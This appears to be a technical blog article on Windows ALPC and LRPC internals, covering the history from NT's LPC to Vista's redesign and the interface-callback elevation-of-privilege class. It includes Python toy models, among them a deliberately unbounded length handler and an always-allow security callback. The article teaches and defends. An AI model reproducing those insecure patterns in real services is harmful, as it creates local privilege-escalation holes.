Parag Mali - tag: security

Every UAC Prompt Is an ALPC Handshake: A Field Guide to Windows' Most-Attacked Local IPC Fabric

noreply@paragmali.com (Parag Mali) — Wed, 27 May 2026 00:00:00 GMT

Every Windows service that exposes a local API does so through **LRPC**, the RPC runtime's local-only transport, and LRPC rides on top of **ALPC**, the kernel's asynchronous message-and-attribute IPC primitive. The kernel layer is settled engineering. The interface-callback layer in user-mode RPC application code is the load-bearing local elevation-of-privilege surface that almost every Patch Tuesday since 2018 has shipped fixes for. Microsoft does not publish a Win32 or WDK reference for the kernel-side ALPC API; the public knowledge of both layers comes from a handful of named researchers reverse-engineering it. And per-connection ALPC ports are unnamed, which is the asymmetry that makes the threat model coherent -- Section 4 walks why.

1. Every UAC Prompt Is an ALPC Handshake

Double-click an installer. The screen dims, a familiar dialog asks whether you want to allow this app to make changes, and a moment later either nothing happens or the installer keeps running. That moment of dim-and-prompt -- the User Account Control consent dialog -- is the most-seen artefact of one of the most-attacked primitives in the Windows kernel: a four-phase handshake on an asynchronous local-IPC port whose name does not appear in any Win32 or WDK reference Microsoft publishes.

Trace the call from the user side. The Explorer shell invokes ShellExecuteEx with the verb set to runas. That call does not magically elevate the process; it sends a request to another process, the Application Information service (appinfo) running as svchost.exe -k netsvcs with SYSTEM authority [@msdocs-svchost] [@forshaw-rpc-2019]. The hand-off is an RPC call. The RPC runtime, asked for a local endpoint, selects the ncalrpc protocol sequence -- "Local procedure call" in Microsoft's own protocol-sequence reference [@msdocs-protseq]. Underneath that string is the LRPC transport in rpcrt4.dll, and underneath the LRPC transport is a kernel ALPC port that lives at the Object Manager name \RPC Control\appinfo. The kernel resolves the name, the handshake completes, and a single syscall named NtAlpcSendWaitReceivePort [@ntdoc-ntalpc] carries the request message into the SYSTEM-context server and the reply back.

That syscall is the load-bearing entry point for the entire local-IPC fabric. Microsoft Learn does not publish a reference page for it. The de facto reference is a community-maintained header dump at ntdoc.m417z.com [@ntdoc-ntalpc] that lists all eight parameters of the function. The kernel object behind the call is the _ALPC_PORT, and the per-connection structure layouts are documented only on Geoff Chappell's site [@chappell-alpc] [@chappell-alpcp] and inside the chapter named Advanced local procedure call (ALPC) of Windows Internals 7e Part 2 [@wininternals-7e].

**ALPC (Advanced Local Procedure Call).** The kernel object and syscall family that replaced classic LPC in Windows Vista (November 2006). ALPC is an asynchronous, message-and-attribute IPC primitive built around the `_ALPC_PORT` object. The user-mode entry points are the undocumented `Nt*Alpc*` and `Alpc*` functions exported from `ntdll.dll`. Every local RPC call in modern Windows transits an ALPC port [@csandker-alpc].

**LRPC (Local RPC).** The Microsoft RPC runtime's transport selected when an application binds to the `ncalrpc` protocol sequence [@msdocs-protseq]. LRPC layers the RPC interface-registration model -- IDL, NDR marshalling, security callbacks -- on top of ALPC ports. LRPC is implemented inside `rpcrt4.dll`; the kernel does not know it exists. The kernel sees only ALPC messages.

The abbreviation collision is real and bites every newcomer. LPC is the original Windows NT 3.1 kernel primitive. LRPC is the RPC runtime's local transport, named in Windows NT 3.5 (1994), more than a decade before ALPC existed [@custer-solomon-2e]. LRPC was a transport name when the underlying kernel object was still LPC. Vista renamed the kernel object to ALPC; nobody renamed the transport. The two abbreviations differ by one letter and refer to different layers.

Two layers sit on top of one kernel object. The kernel layer is what Nt*Alpc* syscalls touch. The user-mode layer is the RPC runtime's interface dispatch -- the IDL stubs, the NDR encoders, the per-interface security callback the application registers with RpcServerRegisterIf2 [@msdocs-rpcregisterif2]. The rest of this article pulls these two layers apart, walks the history that produced them, and explains why almost every Patch Tuesday since 2018 has shipped fixes inside the second one.

sequenceDiagram
    participant Client as Client (ShellExecuteEx peer)
    participant ConnPort as Connection port \RPC Control\appinfo
    participant CommPort as Per-connection communication ports (unnamed)
    participant Server as AppInfo service (SYSTEM)
    Client->>ConnPort: NtAlpcConnectPort (CONNECT)
    ConnPort->>Server: ALPC connect message queued
    Server->>CommPort: NtAlpcAcceptConnectPort (ACCEPT, returns paired handles)
    Client->>CommPort: NtAlpcSendWaitReceivePort (REQUEST)
    CommPort->>Server: ALPC message with NDR-encoded args
    Server->>CommPort: NtAlpcSendWaitReceivePort (REPLY)
    CommPort->>Client: NDR-encoded reply delivered
    Client->>CommPort: NtAlpcDisconnectPort (CLOSE)

The diagram is the article in miniature. Two of the four labelled actors are kernel objects: a named connection port and an unnamed pair of communication ports, with the kernel's message queues running between them. The other two are application code running in two different processes. The bugs of the next thirteen years live in the application code. The diagram's correctness rests on a structural fact almost every secondary writeup gets wrong, and Section 4 spells it out in full.

If this primitive is everywhere, why does nobody talk about it? Because nobody had to, for thirteen years.

2. Origins -- Cutler's NT and the Birth of LPC (1989-1993)

Dave Cutler talked about it, in October 1988, to a room of people he was trying to recruit out of Digital Equipment Corporation [@zachary-showstopper]. The pitch was a from-scratch portable operating system at Microsoft. The architectural commitment that mattered for our story was a microkernel-style design: the Windows personality, the OS/2 personality, the POSIX personality would all run as user-mode subsystems, each in its own process, talking to clients through a fast in-machine remote procedure call. The kernel would not implement the Win32 API directly. The kernel would implement an IPC primitive shaped like a procedure call and cheap enough to use for every Win32 API call a process made.

That decision created a design problem the team had to solve before any of the subsystems could be written. Microkernel-style separation of subsystems means that the Win32 client of CreateWindow is in one process and the Win32 server that draws the window is in another. Every API call crosses a process boundary. The IPC primitive that carries the crossing has to look like a function call, return like a function call, and cost no more than tens of microseconds. The Cutler team -- Lou Perazzoli, Mark Lucovsky, Steven Wood, Darryl Havens, and the larger NT design group [@zachary-showstopper] -- shipped that primitive as Local Procedure Call, or LPC, with the first release of Windows NT in July 1993. Helen Custer documented the design that same year in Inside Windows NT [@custer-print], the canonical first-edition print primary.

**LPC (Local Procedure Call).** The original Windows NT kernel IPC primitive, introduced with NT 3.1 in July 1993 as a synchronous inter-process communication facility [@csandker-alpc]. LPC was synchronous-call-shaped, used three port objects per connection (one named connection port plus two unnamed communication ports), and was the transport for every Win32 API call into the Client/Server Runtime Subsystem (CSRSS) until Windows Vista. The kernel removed classic LPC entirely by Windows 7; legacy `NtCreatePort` callers were silently redirected onto the ALPC implementation [@csandker-alpc].

The classic LPC mechanism worked like this. A server process calls NtCreatePort to create a connection port under an Object Manager name (for example, \Windows\ApiPort for CSRSS). The server then waits on the connection port. A client process opens the connection port by name and calls NtConnectPort to request a session. The kernel creates two new, unnamed communication ports -- one the client holds, one the server holds -- and ties them to the connection through the kernel's port-routing tables. From that point on, the client and server send messages through their respective communication-port handles; neither party has to look up the other in the Object Manager namespace. The three-port model is the architectural ancestor of every ALPC handshake the rest of this article will walk.

flowchart LR
    A[Client process] -- "NtConnectPort by name" --> B[Connection port \Windows\ApiPort -- NAMED]
    B -- "NtAcceptConnectPort" --> C[Server process]
    C -- "issues a pair of handles" --> D[Client comm port -- UNNAMED]
    C -- "issues a pair of handles" --> E[Server comm port -- UNNAMED]
    A -- "NtRequestWaitReplyPort" --> D
    D -- "kernel routes the message" --> E
    E -- "delivered to" --> C

The two design pinch-points that Vista would later have to fix are visible already in the 1993 mechanism. First, the call surface was synchronous: NtRequestWaitReplyPort sent a message and blocked the caller until the reply came back, which forced the higher-level RPC runtime to wrap its own asynchronous machinery around the syscall and doubled the syscall cost for every async RPC. Second, the message payload had a small fixed inline budget -- on the order of 256 bytes [@csandker-alpc] -- with anything larger requiring an explicit NtMapViewOfSection dance to set up a shared section the server would then peek into. The split between "short message in the syscall" and "long payload in a shared section" was awkward, racy, and a perennial source of off-by-one bugs in the server stubs.

The third pinch-point was security, and it is the one Cesar Cerrudo would name in 2006. LPC's access check happened once, at NtConnectPort, against the connection port's discretionary access control list (DACL). After the handshake, the kernel had no further opinion about who could send what to whom over the established channel. The server trusted every message it received because the kernel had already vouched that the client cleared the DACL at connect time. In 1993 that trust model was fine. The only callers of CSRSS were Win32 client processes the team controlled. POSIX clients talked to the POSIX subsystem; OS/2 clients talked to the OS/2 subsystem; the trust boundaries were the subsystem boundaries and nobody crossed them on purpose.
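The once-at-connect check can be sketched as a toy model. This is not the kernel's implementation: `ConnectionPort`, `Channel`, and the set-of-names DACL are hypothetical simplifications invented for illustration. The only point is that the access check lives in `connect` and nowhere else.

```python
from dataclasses import dataclass, field


@dataclass
class Channel:
    """Stand-in for the paired, unnamed communication ports."""
    inbox: list = field(default_factory=list)

    def send(self, body: bytes) -> None:
        # No access check here: once the channel exists, it is trusted.
        self.inbox.append(body)


@dataclass
class ConnectionPort:
    """Stand-in for a named LPC connection port guarded by a DACL."""
    name: str
    dacl: set  # principals allowed to connect (hypothetical simplification)

    def connect(self, principal: str) -> Channel:
        # The only access check in the model, mirroring the check at NtConnectPort.
        if principal not in self.dacl:
            raise PermissionError(f"{principal} denied on {self.name}")
        return Channel()


port = ConnectionPort(r"\Windows\ApiPort", {"alice"})
channel = port.connect("alice")   # DACL consulted here, once
port.dacl.discard("alice")        # tighten the DACL after the handshake
channel.send(b"still delivered")  # the established channel is unaffected
```

Tightening the DACL after the handshake blocks new connections in this model but does nothing to the channel that already exists, which is the property the rest of the section turns on.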

The microkernel idea -- pull as much out of the kernel as possible, run it as user-mode servers -- was a late-1980s academic enthusiasm, energised by Carnegie Mellon's Mach. Cutler brought it to NT after building VMS and the never-shipped Mica research kernel at Digital. The catch was performance. Every API call that used to be a function call inside the kernel now had to be a context switch, a message copy, and a reply, twice. If that round trip cost a millisecond, Windows would feel like a 1980s timesharing system. LPC's job was to make it cost microseconds, and the team's success there is one reason NT could ship at all. The structural cost -- a synchronous primitive whose security check ran once and then trusted the channel -- was not the 1993 team's problem, because they controlled both ends of every conversation.

The 1993 design assumed the only callers of CSRSS were Win32 client processes the team controlled. That assumption held for thirteen years.

3. The First Reckoning -- LPC's Failure Modes and Cerrudo's WLSI 2006

In March 2006, at Black Hat Europe in Amsterdam, Cesar Cerrudo gave a talk titled WLSI -- Windows Local Shellcode Injection. Eight months later, Microsoft shipped the Vista ALPC redesign. The tight timing is suggestive, but it is not the whole story: the Vista redesign had been underway inside the kernel team for years before Cerrudo's talk. What the talk did was give the public security community a name and a shape for the structural class of bug the redesign was about to address.

Cerrudo's paper, archived at Exploit-DB under the title WLSI Windows Local Shellcode Injection and dated March 14, 2006 [@cerrudo-exploitdb], with the speaker deck mirrored on Black Hat's own server [@cerrudo-bh-pdf], walked an end-to-end attack on an LPC server inside CSRSS. The exact server is less important than the attack's three-clause shape, which Cerrudo articulated and which would recur, over the next two decades, in every later ALPC and LRPC privilege-escalation primitive.

flowchart LR
    A[Port is reachable -- the connection port DACL admits the attacker] --> D[Local elevation-of-privilege primitive]
    B[Server trusts the message -- no per-message identity check or per-procedure authorization] --> D
    C[Channel survives the access check -- LPC checks the DACL once at NtConnectPort, then forgets] --> D

Clause one: the port is reachable. The LPC connection port has a DACL; the attacker happens to be inside it. For CSRSS's \Windows\ApiPort, that means "any Win32 process on the desktop", which is exactly what NT was supposed to permit. Clause two: the DACL is permissive. Every authenticated user is in scope of the LPC servers that brokered the user-mode Win32 API surface, by design. Clause three: the server trusts the message. The LPC kernel object exposes a PORT_MESSAGE header with two fields the receiver can use for bookkeeping -- a process ID and a thread ID. The fields are not authenticated. The receiving server, in the WLSI demonstration, read attacker-controlled offsets and lengths out of the message body and walked into the server's own address space.

The three clauses together produce a local elevation primitive. None of the clauses, taken individually, is a kernel bug. None, taken individually, is even an application bug. The bug -- in the WLSI exemplar -- is that the CSRSS server trusted a length field that came from a process the server itself had no reason to trust. The OS did exactly what its security model promised. The application did exactly what the IPC primitive made easy.
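The "trusted a length field" failure can be illustrated with a small sketch. It is not a reconstruction of the WLSI exploit: the message layout (two little-endian 32-bit fields), the `SERVER_MEMORY` buffer, and both handler names are assumptions made up for this example, and the toy leaks data instead of injecting shellcode.

```python
import struct

PUBLIC_SIZE = 8
# Hypothetical server memory: a public region followed by data the client must not see.
SERVER_MEMORY = b"PUBLIC--" + b"SECRET-TOKEN"


def parse_request(message: bytes) -> tuple:
    """Read the two client-supplied fields: offset and length (unsigned 32-bit)."""
    return struct.unpack_from("<II", message, 0)


def naive_handler(message: bytes) -> bytes:
    offset, length = parse_request(message)
    # Uses the client-supplied offset and length without any bounds check.
    return SERVER_MEMORY[offset:offset + length]


def checked_handler(message: bytes) -> bytes:
    offset, length = parse_request(message)
    # Refuses any request that reaches past the region the client may read.
    if offset + length > PUBLIC_SIZE:
        raise ValueError("request exceeds the public region")
    return SERVER_MEMORY[offset:offset + length]


hostile = struct.pack("<II", 0, len(SERVER_MEMORY))
leaked = naive_handler(hostile)  # includes the bytes past the public region
```

Nothing in the transport is at fault in this sketch. The difference between the two handlers is three lines of application code, which is the shape of the argument the section makes about CSRSS.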

**DACL (discretionary access control list).** A Windows access control list attached to a securable object (a file, a registry key, a kernel object such as an LPC or ALPC port) that names the security principals allowed or denied each access right. For an LPC connection port, the DACL governs whether a calling process is allowed to open the port at all. Once the port is opened, the DACL is no longer consulted for messages flowing across the established connection -- which is exactly the once-and-done check at the centre of Cerrudo's structural class.

The 1993 trust model held until 2006 because the team controlled both ends of every conversation. Cerrudo named the class of bug that emerged when that assumption stopped holding.

That structural class is the load-bearing reason the Vista redesign was about to be a redesign and not a patch. The three LPC failure modes the kernel team had identified -- the ones that motivated re-architecting the primitive rather than fixing the WLSI server -- compose a near-perfect mirror of Cerrudo's three clauses. They are: (1) the synchronous-only design forced the RPC runtime to layer its own asynchronous wrapper around NtRequestWaitReplyPort, doubling the per-call syscall cost for async RPC; (2) the 256-byte inline plus shared-section dance was awkward and prone to race conditions in the server stub; (3) the port-DACL-only security model checked access once at connect and then trusted the channel, with no kernel primitive for per-message caller identity. A redesign was the only way to attack all three at once without breaking every NT 4-era server in the field.

One LPC failure mode that did not make Cerrudo's slide and that Microsoft has never publicly discussed in detail was the reply-port confusion class. In classic LPC, a server's reply traveled back over the client's communication port handle, and a misbehaving server could be tricked into replying to the wrong client when multiple connections were interleaved. Microsoft addressed this quietly in the Vista era; the only public references are footnotes in Windows Internals editions and the occasional aside in csandker [@csandker-alpc]. The public security community did not catch the bug class at the time.

In November 2006 -- eight months after WLSI -- Windows Vista shipped. The new kernel called the replacement primitive Advanced LPC. The redesign closed half of Cerrudo's structural class -- the permissive port DACL half, by giving servers fine-grained tools to control who reaches their connection ports and by introducing a per-message security attribute the server could query for caller identity. It left the other half completely intact, because the other half is not a kernel property. The other half lives in the user-mode RPC runtime and in the application code that registers RPC interfaces on top of ALPC ports. That intact half is what the next thirteen years of public security research is about.

The naive read of Cerrudo's paper is "Microsoft will fix the bug." The structural read is harder: Cerrudo did not find a bug. He named a class of bug whose root cause is a property of the trust model. The Vista redesign closed the half of the class the kernel could close. It could not close the rest, because the rest is application code, and the kernel cannot inspect application code.

4. The Breakthrough -- ALPC, the Vista Redesign, and the Message-Attribute System

The Vista kernel team's answer to Cerrudo was not a patch. It was a complete replacement of the kernel object.

ALPC re-cast the LPC port as an asynchronous, message-and-attribute-based primitive. The classic LPC quartet -- NtRequestPort, NtReplyPort, NtRequestWaitReplyPort, NtReplyWaitReplyPort -- collapsed into a single syscall, NtAlpcSendWaitReceivePort [@ntdoc-ntalpc], with eight parameters whose combinations express every variant the older quartet supported. The kernel object behind the syscall is the _ALPC_PORT. The structure layout is documented only in the chapter named Advanced local procedure call (ALPC) of Windows Internals 7e Part 2 [@wininternals-7e], in the reverse-engineered header dumps on Geoff Chappell's site [@chappell-alpc] [@chappell-alpcp], and in the community-maintained phnt headers that the Process Hacker project ships. None of those is a Microsoft Learn page.
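To make "eight parameters whose combinations express every variant" concrete, here is a minimal sketch that mirrors the parameter list and classifies a call by which buffers are supplied. The field names follow the prototype as it appears in the community phnt and NtDoc headers, which is an assumption to check against the header you actually use; `AlpcCall` and `describe` are hypothetical helpers, and flag values are deliberately left out.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class AlpcCall:
    """The eight parameters in prototype order (names assumed from phnt/NtDoc)."""
    port_handle: int
    flags: int = 0
    send_message: Optional[bytes] = None
    send_message_attributes: Optional[object] = None
    receive_message: Optional[bytearray] = None
    buffer_length: Optional[int] = None
    receive_message_attributes: Optional[object] = None
    timeout: Optional[int] = None


def describe(call: AlpcCall) -> str:
    """Classify a call by which message buffers the caller supplied."""
    sending = call.send_message is not None
    receiving = call.receive_message is not None
    if sending and receiving:
        return "send, then wait for a message"
    if sending:
        return "send only"
    if receiving:
        return "receive only"
    return "nothing to send or receive"


request = AlpcCall(port_handle=4, send_message=b"req", receive_message=bytearray(64), buffer_length=64)
```

The real syscall also takes behaviour from the flags word, so this classification is only the coarsest layer of what the combinations can express.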

**`_ALPC_PORT`.** The kernel object at the centre of Vista-and-later local IPC. Named connection ports are referenced by Object Manager name (typically under `\RPC Control`, `\BaseNamedObjects`, or per-session AppContainer subtrees). The per-connection communication ports created by `NtAlpcAcceptConnectPort` are unnamed and exist only as handles in the connecting and accepting processes. The structure layout is undocumented by Microsoft; the canonical reverse-engineered reference is Geoff Chappell's site [@chappell-alpc].

The core of the user-mode syscall surface, as far as anyone outside Microsoft can enumerate it, includes NtAlpcCreatePort, NtAlpcConnectPort, NtAlpcAcceptConnectPort, NtAlpcSendWaitReceivePort, NtAlpcDisconnectPort, NtAlpcCancelMessage, NtAlpcCreatePortSection, and NtAlpcCreateResourceReserve, plus the ALPC_PORT_ATTRIBUTES and message-attribute structures that decorate each call. The list is representative rather than complete; the community headers carry further calls for section views, security contexts, and port information queries. Microsoft Learn does not list any of them under a Win32 or WDK developer-facing reference. NtDoc [@ntdoc-ntalpc] is the de facto syscall reference, and the Windows Internals 7e Part 2 chapter is the de facto architectural reference.

Microsoft has documented the user-mode RPC runtime exhaustively on Learn -- the IDL syntax, the marshalling rules, the binding-handle API, the interface-registration flags. The `Nt*Alpc*` and `Alpc*` kernel surface is the deliberate exception. Microsoft's framing is that ALPC is an *internal* implementation detail of the RPC runtime, not a stable developer-facing API. Application authors are supposed to write RPC code, not ALPC code. The framing is defensible -- the ALPC ABI does change between Windows versions -- but it leaves the entire defender community reverse-engineering the surface from public symbols, the *Windows Internals* book series, NtDoc, Geoff Chappell, and the open-source `phnt` headers. The Vista-and-later structural correctness story this article tells is one that Microsoft has never written down for outside readers.

The structural break with classic LPC is the message-attribute system. Every ALPC message can carry four optional attributes, each of which targets one of the awkward LPC patterns the old kernel forced server authors to roll by hand.

**ALPC message attribute.** An optional decoration on an ALPC message that lets the sender or receiver request a kernel service in band with the message itself. The four attribute types are **Context**, **Handle**, **Security**, and **View**. Each one targets a workflow that classic LPC required application code to perform out of band; in ALPC the kernel does the work atomically with the message exchange.

The Context attribute carries a per-message per-client cookie the server uses to associate the message with a logical operation. In classic LPC, a server tracking a multi-step protocol had to maintain its own client-to-state map indexed by client process ID, with all the race conditions that map invited; the Context attribute moves that bookkeeping into the kernel and makes it correct by construction.

The Handle attribute is first-class handle passing inside the message itself. In classic LPC, transferring a kernel handle from sender to receiver required the sender to call DuplicateHandle with the receiver's process handle, hope the receiver hadn't exited, and then send the resulting handle value in the message body. The Handle attribute lets the kernel do the duplication atomically with delivery; the receiver finds the duplicated handle already in its own handle table when the message lands.

The Security attribute is the per-message identity primitive whose absence Cerrudo had named in 2006. The sender can opt to attach its caller token to a message; the receiver can opt to query the token (process ID, thread ID, integrity level, AppContainer SID) when it dispatches the message. The classic LPC pattern -- "trust the channel because the kernel checked the DACL at connect" -- gets replaced by "ask the kernel who is actually sending this message right now."

The View attribute is the shared-section dance, rewritten. In classic LPC, payloads larger than the inline budget required the sender to call NtCreateSection, both parties to call NtMapViewOfSection, and the receiver to peek into the shared mapping. The View attribute hands the receiver a section view automatically as a side effect of message delivery; no out-of-band coordination is required.

flowchart TD
    A[Context attribute] --> A1[Replaces: server-side client-to-state map indexed by PID]
    B[Handle attribute] --> B1[Replaces: out-of-band DuplicateHandle dance]
    C[Security attribute] --> C1[Replaces: trust the channel because DACL was checked at connect]
    D[View attribute] --> D1[Replaces: NtCreateSection plus NtMapViewOfSection dance for large payloads]
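The four attributes travel as bits in a mask on each message, so a receiver's first step is to work out which ones are present. The sketch below decodes such a mask. The bit values are the ones carried in the community phnt headers as best I can tell; Microsoft does not document them, so treat them as an assumption to verify. `decode_attributes` is a hypothetical helper.

```python
# Bit values as they appear in the community phnt headers (an assumption to
# verify against the header you build with; Microsoft does not document them).
ATTRIBUTE_FLAGS = (
    ("Security", 0x80000000),
    ("View", 0x40000000),
    ("Context", 0x20000000),
    ("Handle", 0x10000000),
)


def decode_attributes(mask: int) -> list:
    """Return the names of the attributes whose bits are set in the mask."""
    return [name for name, bit in ATTRIBUTE_FLAGS if mask & bit]


# A message that carries a Security and a Context attribute.
present = decode_attributes(0x80000000 | 0x20000000)
```

A server that wants the per-message identity check described above would look for the Security entry before trusting anything else in the message.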

The handshake topology survives from classic LPC and tightens. The server creates a named connection port with NtAlpcCreatePort. The client opens the connection port by name with NtAlpcConnectPort and sends an initial connect message; the kernel queues the connect on the server's port. The server calls NtAlpcAcceptConnectPort, and the kernel returns a pair of communication-port handles -- one to the client, one to the server -- that are bound to that single connection. From that point on, the kernel routes messages through the paired handles, and every send or receive is a single call to NtAlpcSendWaitReceivePort. Asynchronous is the default; synchronous semantics are a flag combination. The per-port message queue, the blocked-receiver wake, and the cross-port routing all run inside the kernel dispatcher.

flowchart LR
    A[Client process] -- "NtAlpcConnectPort by name" --> B[Connection port -- NAMED in \RPC Control]
    B -- "kernel queues the connect" --> C[Server process]
    C -- "NtAlpcAcceptConnectPort" --> D[Paired comm ports -- UNNAMED]
    A -- "NtAlpcSendWaitReceivePort" --> D
    D -- "kernel routing" --> C

Here is the structural fact that almost every secondary writeup gets wrong. Only the named connection port has an Object Manager name. The per-connection communication ports created by NtAlpcAcceptConnectPort are unnamed. They have no path under \RPC Control or \BaseNamedObjects or anywhere else. They exist only as handles in the handle tables of the two processes that completed the handshake. No third party can open them, because no third party has a name with which to ask the Object Manager for them.

Key idea: ALPC's structural correctness rests on a single move: the per-connection communication ports are unnamed. Only the parties that completed the handshake can address the channel. The kernel does not let anyone else find it. This is the half of Cerrudo's structural class the Vista redesign actually closed.

Note: A statement like "every ALPC port has an Object Manager name" is wrong, and it propagates a wrong threat model. Named ports are the entry points an attacker can knock on. Unnamed communication ports are the established channels the attacker cannot reach without first being admitted through the connection port's DACL. Defenders who get this wrong start hunting for the unnamed children in the Object Manager namespace and find nothing, then conclude the tooling is broken. The tooling is fine. The ports are not there.
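The named-versus-unnamed asymmetry can be modelled in a few lines. Everything here is hypothetical scaffolding: `ObjectManager`, `Process`, and `handshake` are illustration-only names, and the real kernel creates a pair of communication port objects where this sketch uses a single `channel` object for brevity.

```python
class ObjectManager:
    """Toy namespace: only objects created with a name can be looked up."""

    def __init__(self):
        self._named = {}

    def create_named(self, path, obj):
        self._named[path] = obj

    def open_by_name(self, path):
        if path not in self._named:
            raise FileNotFoundError(path)
        return self._named[path]

    def names(self):
        return sorted(self._named)


class Process:
    def __init__(self, name):
        self.name = name
        self.handles = []  # stand-in for the per-process handle table


def handshake(om, client, server, path):
    om.open_by_name(path)   # the client finds the connection port by name
    channel = object()      # the channel is never registered under any name
    client.handles.append(channel)
    server.handles.append(channel)
    return channel


om = ObjectManager()
om.create_named(r"\RPC Control\appinfo", "connection port")
client, server, bystander = Process("client"), Process("server"), Process("bystander")
channel = handshake(om, client, server, r"\RPC Control\appinfo")
```

After the handshake the namespace still lists exactly one entry, and the bystander's handle table is empty. That is the situation a defender sees when hunting for the unnamed ports in the Object Manager namespace.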

Microsoft's documentation choice has consequences for tooling. The Wireshark dissector for MSRPC handles the on-the-wire NDR encoding well, but it has no view into the kernel ALPC layer because the kernel does not emit a packet capture. To see ALPC at the kernel level the tooling has to subscribe to the Microsoft-Windows-Kernel-ALPC ETW provider [@msdocs-etwsys], and even that provider is gated behind EVENT_TRACE_SYSTEM_LOGGER_MODE, which a non-SYSTEM caller cannot enable. The structural opacity of the kernel layer is partly an artefact of the deliberate "no public WDK developer-facing reference" position.

Backward compatibility was preserved by silent rewiring rather than by parallel kernel objects. The classic LPC syscall names continue to link in any pre-Vista binary, but from Windows 7 onward the kernel routes those calls into the ALPC implementation underneath [@csandker-alpc]. Classic LPC, as an independent kernel object, no longer exists. The 1993 syscall surface is alive only as a thin compatibility shim. The 2006 kernel object is what every modern Windows service actually uses.

The Vista redesign closed the "permissive port DACL" half of the structural problem. It left the "interface callback returns RPC_S_OK when it should return RPC_S_ACCESS_DENIED" half completely intact. That intact half is the rest of this article.

The Vista kernel team's collective attribution stops short of naming individual ALPC architects. Windows Internals 7e Part 2 [@wininternals-7e] credits the work institutionally rather than to a single engineer, and no public Microsoft artefact identifies a single ALPC architect by name; secondary attributions in conference talks and blog posts trace back to footnotes rather than to primary record.

5. The Universalisation -- ALPC as the Local IPC Fabric (2009-2013)

By 2013, ALPC ran the local-IPC traffic of every Windows service that mattered. The kernel team had removed classic LPC. The Vista replacement had not been replaced; it had been adopted.

The transition was technically backwards-compatible. Pre-Vista binaries that called NtCreatePort and NtRequestWaitReplyPort continued to link and run; the kernel preserved the syscall names and silently rerouted the calls into the ALPC implementation underneath [@csandker-alpc]. The compatibility was not lossless -- the old single-message-per-call semantics map onto the ALPC asynchronous primitive only at the cost of an extra wait -- but it was good enough that no Microsoft-shipped service ever needed to be ported by hand from classic LPC. Every service author upgrading to Vista or later was implicitly upgraded to ALPC.

By Windows 8.1 the roll-call of services riding LRPC on ALPC was effectively the roll-call of services that ship with Windows. The Client/Server Runtime Subsystem (CSRSS) had been ALPC-only since Vista. The Local Security Authority Subsystem Service (LSASS) -- which brokers logon, token issuance, and Kerberos ticket caching -- exposes its API surface over LRPC. The Service Control Manager (SCM, services.exe) accepts service-control commands over an LRPC interface. The DCOM activation service (rpcss) marshals every local COM activation request through an LRPC pipeline. Windows Error Reporting, the audio service (audiosrv), Task Scheduler (schedsvc/schrpc), the Application Information service (appinfo) that brokers UAC, the Encrypting File System extension (efslsaext, the EFSRPC server documented in the [MS-EFSR] specification [@ms-efsr]), the print spooler (spoolsv), and the Background Intelligent Transfer Service (BITS) all expose at least one LRPC interface for client communication [@csandker-rpc].

flowchart TD
    K[Kernel ALPC layer -- _ALPC_PORT objects, NtAlpcSendWaitReceivePort dispatcher]
    K --> CSRSS[CSRSS -- Win32 subsystem]
    K --> LSASS[LSASS -- logon and token issuance]
    K --> SCM[Service Control Manager]
    K --> RPCSS[RPCSS -- DCOM activator and epmapper]
    K --> APPINFO[AppInfo -- UAC consent broker]
    K --> SPOOL[Print Spooler]
    K --> SCHRPC[Task Scheduler -- schrpc and schedsvc]
    K --> BITS[BITS -- background transfers]
    K --> AUDIO[Audio service -- audiosrv]
    K --> EFS[EFS -- efslsaext]

That fan-out is the article's load-bearing diagram for understanding why ALPC is the most-attacked local IPC fabric in modern Windows. Every named service in that diagram is reachable over an LRPC interface. Every LRPC interface registers a per-interface security callback through RpcServerRegisterIf2 [@msdocs-rpcregisterif2] or RpcServerRegisterIf3 [@msdocs-rpcregisterif3]. Every callback is application code that the kernel cannot inspect. A single permissive interface in a single one of those services is a structural primitive that works against the transport every service uses. Trail of Bits, announcing their RPC Investigator tool in January 2023, captured the surface area in one line: MSRPC is "involved on some level in nearly every activity that you can take on a Windows system, from logging in to your laptop to opening a file" [@tob-rpcinv-blog].

To see the fabric in operation, walk one call. An unprivileged user invokes StartServiceW from the SCM client library inside sechost.dll. The library binds to the SCM's local RPC endpoint -- the \RPC Control\ntsvcs ALPC port that the Service Control Manager registers at boot. The MIDL-generated client stub packs the service name and arguments into NDR and hands them to NdrClientCall3. rpcrt4.dll crosses into the kernel through NtAlpcSendWaitReceivePort. The kernel routes the ALPC message to the SCM's blocked worker thread inside services.exe. The worker, running as SYSTEM, unpacks the NDR body with NdrStubCall3 and prepares to dispatch the server-side procedure. Before the procedure runs, the RPC runtime invokes the interface security callback, which checks whether the caller's token holds SC_MANAGER_CONNECT and the target service's DACL grants SERVICE_START. If the callback returns RPC_S_OK, the SCM starts the service. The reply -- an NDR-encoded error code -- rides another NtAlpcSendWaitReceivePort back to the client. One user call, five layers crossed, and the kernel never knew it was running an RPC.
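The role of the interface security callback in that walk can be sketched as a toy dispatcher. This is a model, not the RPC runtime: `Interface`, `dispatch`, the dictionary-shaped caller, and the callback signature are hypothetical, and the real callback registered through RpcServerRegisterIf2 has a different C signature. The two status values are the standard Win32 codes.

```python
RPC_S_OK = 0             # ERROR_SUCCESS
RPC_S_ACCESS_DENIED = 5  # ERROR_ACCESS_DENIED


class Interface:
    def __init__(self, procedures, security_callback=None):
        self.procedures = procedures            # opnum -> server procedure
        self.security_callback = security_callback


def dispatch(interface, caller, opnum, *args):
    """Run the security callback, if any, before the server procedure."""
    callback = interface.security_callback
    if callback is not None:
        status = callback(caller, opnum)
        if status != RPC_S_OK:
            return status, None
    # With no callback registered, every caller reaches the procedure.
    return RPC_S_OK, interface.procedures[opnum](*args)


def strict_callback(caller, opnum):
    return RPC_S_OK if caller.get("is_admin") else RPC_S_ACCESS_DENIED


def permissive_callback(caller, opnum):
    return RPC_S_OK  # admits everyone, which is the bug class in miniature


def start_service(name):
    return f"started {name}"


procedures = {0: start_service}
user = {"name": "unprivileged", "is_admin": False}
guarded = dispatch(Interface(procedures, strict_callback), user, 0, "Spooler")
exposed = dispatch(Interface(procedures, permissive_callback), user, 0, "Spooler")
unchecked = dispatch(Interface(procedures), user, 0, "Spooler")
```

In this model the transport is identical in all three calls. Only the callback differs, and a permissive or missing callback gives the unprivileged caller the same result an administrator would get.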

